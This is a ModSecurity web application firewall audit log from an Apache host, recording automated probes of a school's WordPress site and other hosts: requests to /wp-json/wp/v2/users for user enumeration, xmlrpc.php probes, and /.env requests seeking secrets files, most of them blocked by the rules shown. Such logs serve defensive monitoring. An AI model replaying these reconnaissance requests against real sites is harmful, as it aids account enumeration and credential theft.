ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746670352222905 845 (- - -) Stopwatch2: 1746670352222905 845; combined=355, p1=313, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f514b44-Z-- --5b34d017-A-- [08/May/2025:09:32:29 +0700] aBwXvY4K347NtBcwXKwFrgAAAIM 103.236.140.4 42846 103.236.140.4 8181 --5b34d017-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b34d017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b34d017-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746671549039819 3271 (- - -) Stopwatch2: 1746671549039819 3271; combined=1448, p1=507, p2=909, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b34d017-Z-- --2e3b7c5f-A-- [08/May/2025:09:32:36 +0700] aBwXxCs5rYyn3jlLjjK_IQAAAMw 103.236.140.4 42850 103.236.140.4 8181 --2e3b7c5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e3b7c5f-C-- demo.sayHello --2e3b7c5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e3b7c5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746671556188584 5989 (- - -) Stopwatch2: 1746671556188584 5989; combined=4299, p1=553, p2=3472, p3=35, p4=35, p5=116, sr=75, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e3b7c5f-Z-- --0891cf42-A-- [08/May/2025:09:35:24 +0700] aBwYbKcs1DvJ_HgMHE_xzAAAAAo 103.236.140.4 42868 103.236.140.4 8181 --0891cf42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0891cf42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0891cf42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746671724826803 2702 (- - -) Stopwatch2: 1746671724826803 2702; combined=1081, p1=381, p2=677, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0891cf42-Z-- --19a78e6e-A-- [08/May/2025:09:35:30 +0700] aBwYcqcs1DvJ_HgMHE_xzgAAABA 103.236.140.4 42872 103.236.140.4 8181 --19a78e6e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19a78e6e-C-- demo.sayHello --19a78e6e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19a78e6e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746671730644213 5475 (- - -) Stopwatch2: 1746671730644213 5475; combined=4128, p1=501, p2=3299, p3=41, p4=32, p5=172, sr=71, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a78e6e-Z-- --760ca14b-A-- [08/May/2025:09:43:51 +0700] aBwaZ6cs1DvJ_HgMHE_x2gAAAAo 103.236.140.4 42932 103.236.140.4 8181 --760ca14b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --760ca14b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --760ca14b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746672231633560 3254 (- - -) Stopwatch2: 1746672231633560 3254; combined=1418, p1=474, p2=911, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --760ca14b-Z-- --3b291045-A-- [08/May/2025:09:53:20 +0700] aBwcoMP9GxxPAbCroFbM6gAAAEc 103.236.140.4 42966 103.236.140.4 8181 --3b291045-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b291045-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b291045-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746672800467899 3267 (- - -) Stopwatch2: 1746672800467899 3267; combined=1437, p1=512, p2=893, p3=0, p4=0, p5=31, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b291045-Z-- --aad9a55a-A-- [08/May/2025:09:53:25 +0700] aBwcpacs1DvJ_HgMHE_x3wAAABY 103.236.140.4 42968 103.236.140.4 8181 --aad9a55a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.5.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.5.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aad9a55a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aad9a55a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746672805158118 3111 (- - -) Stopwatch2: 1746672805158118 3111; combined=1350, p1=476, p2=833, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aad9a55a-Z-- --5f537975-A-- [08/May/2025:09:53:29 +0700] aBwcqcP9GxxPAbCroFbM6wAAAE0 103.236.140.4 42972 103.236.140.4 8181 --5f537975-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5f537975-C-- demo.sayHello --5f537975-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f537975-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746672809498778 5507 (- - -) Stopwatch2: 1746672809498778 5507; combined=4094, p1=482, p2=3383, p3=31, p4=34, p5=95, sr=70, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f537975-Z-- --37847443-A-- [08/May/2025:09:57:07 +0700] aBwdg44K347NtBcwXKwFswAAAJE 103.236.140.4 42998 103.236.140.4 8181 --37847443-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37847443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37847443-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746673027299874 3049 (- - -) Stopwatch2: 1746673027299874 3049; combined=1467, p1=483, p2=953, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37847443-Z-- --6024543c-A-- [08/May/2025:09:57:12 +0700] aBwdiCs5rYyn3jlLjjK_LwAAANM 103.236.140.4 43002 103.236.140.4 8181 --6024543c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6024543c-C-- demo.sayHello --6024543c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6024543c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746673032919345 5001 (- - -) Stopwatch2: 1746673032919345 5001; combined=3770, p1=470, p2=3093, p3=26, p4=28, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6024543c-Z-- --ac3ae973-A-- [08/May/2025:09:58:45 +0700] aBwd5acs1DvJ_HgMHE_x4gAAABc 103.236.140.4 43036 103.236.140.4 8181 --ac3ae973-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ac3ae973-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac3ae973-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746673125203066 838 (- - -) Stopwatch2: 1746673125203066 838; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac3ae973-Z-- --93b9e81e-A-- [08/May/2025:10:18:24 +0700] aBwigMP9GxxPAbCroFbM8wAAAEU 103.236.140.4 43350 103.236.140.4 8181 --93b9e81e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Accept-Charset: utf-8 --93b9e81e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b9e81e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746674304184505 826 (- - -) Stopwatch2: 1746674304184505 826; combined=347, p1=302, p2=0, p3=0, p4=0, p5=45, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b9e81e-Z-- --e733e202-A-- [08/May/2025:10:27:56 +0700] aBwkvCs5rYyn3jlLjjK_RAAAANA 103.236.140.4 43418 103.236.140.4 8181 --e733e202-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e733e202-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e733e202-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746674876297504 2620 (- - -) Stopwatch2: 1746674876297504 2620; combined=1072, p1=359, p2=691, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e733e202-Z-- --7ad53f3f-A-- [08/May/2025:10:28:06 +0700] aBwkxo4K347NtBcwXKwGPwAAAI8 103.236.140.4 43422 103.236.140.4 8181 --7ad53f3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ad53f3f-C-- demo.sayHello --7ad53f3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ad53f3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746674886003993 5882 (- - -) Stopwatch2: 1746674886003993 5882; combined=4130, p1=547, p2=3331, p3=47, p4=44, p5=97, sr=88, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ad53f3f-Z-- --d30f7d57-A-- [08/May/2025:10:29:43 +0700] aBwlJ44K347NtBcwXKwGRwAAAIY 103.236.140.4 43454 103.236.140.4 8181 --d30f7d57-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 159.65.144.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 159.65.144.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d30f7d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d30f7d57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746674983776025 693 (- - -) Stopwatch2: 1746674983776025 693; combined=277, p1=243, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d30f7d57-Z-- --c2ece815-A-- [08/May/2025:10:37:05 +0700] aBwm4Ss5rYyn3jlLjjK_TwAAAMo 103.236.140.4 43494 103.236.140.4 8181 --c2ece815-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.254.28.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.254.28.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2ece815-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2ece815-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746675425776285 3239 (- - -) Stopwatch2: 1746675425776285 3239; combined=1423, p1=476, p2=906, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2ece815-Z-- --8ccc9032-A-- [08/May/2025:10:42:50 +0700] aBwoOqcs1DvJ_HgMHE_x7AAAABQ 103.236.140.4 43564 103.236.140.4 8181 --8ccc9032-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 152.44.253.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.44.253.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ccc9032-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ccc9032-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746675770498827 2837 (- - -) Stopwatch2: 1746675770498827 2837; combined=1253, p1=442, p2=780, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ccc9032-Z-- --3b3a3f3f-A-- [08/May/2025:10:51:10 +0700] aBwqLo4K347NtBcwXKwGTQAAAJg 103.236.140.4 43608 103.236.140.4 8181 --3b3a3f3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 